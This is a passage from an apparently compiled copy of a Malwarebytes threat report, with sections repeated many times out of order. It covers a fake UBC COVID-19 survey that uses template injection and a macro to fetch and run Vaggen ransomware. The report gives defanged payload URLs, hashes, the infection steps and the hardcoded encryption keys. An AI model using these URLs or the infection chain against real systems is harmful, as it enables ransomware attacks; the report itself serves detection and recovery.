gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1360 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1361 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1362 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1363 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1364 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1365 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1366 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1367 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1368 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1369 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1370 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1371 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1372 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1373 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1374 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1375 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1376 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1377 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1378 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1379 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1380 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1381 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1382 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1383 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1384 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1385 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1386 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1387 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1388 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1389 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1390 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1391 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1392 of 3467\n\nFiles are encrypted with 